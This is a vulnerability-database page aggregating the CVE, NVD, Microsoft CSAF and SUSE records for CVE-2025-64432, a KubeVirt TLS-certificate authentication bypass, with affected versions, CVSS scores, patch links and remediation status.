Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64432 (GCVE-0-2025-64432)
Vulnerability from cvelistv5 – Published: 2025-11-07 18:38 – Updated: 2025-11-07 18:54
VLAI?
EPSS
Title
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer
Summary
KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer's authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.
Severity ?
4.7 (Medium)
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64432",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-07T18:54:22.327810Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T18:54:46.779Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.3"
},
{
"status": "affected",
"version": "\u003e= 1.6.0, \u003c 1.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-295",
"description": "CWE-295: Improper Certificate Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T18:38:33.246Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
}
],
"source": {
"advisory": "GHSA-38jw-g2qx-4286",
"discovery": "UNKNOWN"
},
"title": "KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64432",
"datePublished": "2025-11-07T18:38:33.246Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-07T18:54:46.779Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64432\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T19:16:26.833\",\"lastModified\":\"2025-11-25T15:56:30.843\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Las versiones 1.5.3 e inferiores, y 1.6.0 conten\u00edan una implementaci\u00f3n defectuosa del flujo de autenticaci\u00f3n de la capa de agregaci\u00f3n de Kubernetes que podr\u00eda permitir la elusi\u00f3n de los controles RBAC. Se descubri\u00f3 que el componente virt-API no logra autenticar correctamente al cliente al recibir solicitudes de API a trav\u00e9s de mTLS. En particular, no logra validar el campo CN (Common Name) en los certificados TLS del cliente recibidos contra el conjunto de valores permitidos definidos en el configmap \u0027extension-apiserver-authentication\u0027. La falta de validaci\u00f3n de ciertos campos en el certificado TLS del cliente puede permitir a un atacante eludir los controles RBAC existentes al comunicarse directamente con el servidor API agregado, suplantando al servidor API de Kubernetes y su componente agregador. Este problema est\u00e1 corregido en las versiones 1.5.3 y 1.6.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":4.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.0,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":4.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.0,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"},{\"lang\":\"en\",\"value\":\"CWE-295\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndExcluding\":\"1.5.3\",\"matchCriteriaId\":\"D06A16D0-A19D-4FC9-BBB2-DD155157AD8E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"7AC531A2-1D99-4F6E-8C95-57B3B6B15681\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"3A5C8C2B-705D-435E-93A7-0523DC4A97BE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"A6326DB3-2CBC-4B85-94C8-9F2B2B458548\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64432\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-07T18:54:22.327810Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-07T18:54:25.963Z\"}}], \"cna\": {\"title\": \"KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer\", \"source\": {\"advisory\": \"GHSA-38jw-g2qx-4286\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.6.0, \u003c 1.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-295\", \"description\": \"CWE-295: Improper Certificate Validation\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T18:38:33.246Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64432\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-07T18:54:46.779Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T18:38:33.246Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
MSRC_CVE-2025-64432
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2026-01-02 14:39Summary
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64432 KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64432.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer",
"tracking": {
"current_release_date": "2026-01-02T14:39:19.000Z",
"generator": {
"date": "2026-01-02T21:02:43.458Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64432",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:01:47.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:21.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:47:34.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2025-12-23T01:36:55.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
},
{
"date": "2026-01-02T14:39:19.000Z",
"legacy_version": "5",
"number": "5",
"summary": "Information published."
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
},
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "4"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "20703"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product": {
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "20656"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-33",
"product": {
"name": "cbl2 kubevirt 0.59.0-33",
"product_id": "20772"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-4"
},
"product_reference": "4",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "20703-17086"
},
"product_reference": "20703",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-3"
},
"product_reference": "3",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "20656-17084"
},
"product_reference": "20656",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "17086-1"
},
"product_reference": "1",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "20772-17086"
},
"product_reference": "20772",
"relates_to_product_reference": "17086"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64432",
"cwe": {
"id": "CWE-287",
"name": "Improper Authentication"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20703-17086",
"20656-17084",
"20772-17086"
],
"known_affected": [
"17086-4",
"17086-2",
"17084-3",
"17086-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64432 KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64432.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:01:47.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-4"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:01:47.000Z",
"details": "0.59.0-33:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-2",
"17086-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:01:47.000Z",
"details": "1.5.3-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-3"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 4.7,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17086-4",
"17086-2",
"17084-3",
"17086-1"
]
}
],
"title": "KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer"
}
]
}
FKIE_CVE-2025-64432
Vulnerability from fkie_nvd - Published: 2025-11-07 19:16 - Updated: 2025-11-25 15:56
Severity ?
4.7 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
4.7 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
4.7 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
Summary
KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer's authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E",
"versionEndExcluding": "1.5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:*",
"matchCriteriaId": "7AC531A2-1D99-4F6E-8C95-57B3B6B15681",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:*",
"matchCriteriaId": "3A5C8C2B-705D-435E-93A7-0523DC4A97BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:*",
"matchCriteriaId": "A6326DB3-2CBC-4B85-94C8-9F2B2B458548",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Las versiones 1.5.3 e inferiores, y 1.6.0 conten\u00edan una implementaci\u00f3n defectuosa del flujo de autenticaci\u00f3n de la capa de agregaci\u00f3n de Kubernetes que podr\u00eda permitir la elusi\u00f3n de los controles RBAC. Se descubri\u00f3 que el componente virt-API no logra autenticar correctamente al cliente al recibir solicitudes de API a trav\u00e9s de mTLS. En particular, no logra validar el campo CN (Common Name) en los certificados TLS del cliente recibidos contra el conjunto de valores permitidos definidos en el configmap \u0027extension-apiserver-authentication\u0027. La falta de validaci\u00f3n de ciertos campos en el certificado TLS del cliente puede permitir a un atacante eludir los controles RBAC existentes al comunicarse directamente con el servidor API agregado, suplantando al servidor API de Kubernetes y su componente agregador. Este problema est\u00e1 corregido en las versiones 1.5.3 y 1.6.1."
}
],
"id": "CVE-2025-64432",
"lastModified": "2025-11-25T15:56:30.843",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-11-07T19:16:26.833",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
},
{
"lang": "en",
"value": "CWE-295"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
SUSE-SU-2026:20610-1
Vulnerability from csaf_suse - Published: 2026-02-27 08:49 - Updated: 2026-02-27 08:49Summary
Security update for kubevirt
Notes
Title of the patch
Security update for kubevirt
Description of the patch
This update for kubevirt fixes the following issues:
Update to version 1.7.0 (bsc#1257128).
Security issues fixed:
- CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS
(bsc#1253189).
- CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into
creating empty files/directories on host (bsc#1257422).
- CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction
(bsc#1241772).
- CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to
bypass existing RBAC controls (bsc#1253181).
- CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).
- CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations
(bsc#1253186).
- CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).
- CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users
(bsc#1253748).
Other updates and bugfixes:
- Upstream now uses stateless firmware for CoCo VMs.
Patchnames
SUSE-SLES-16.0-319
Terms of use
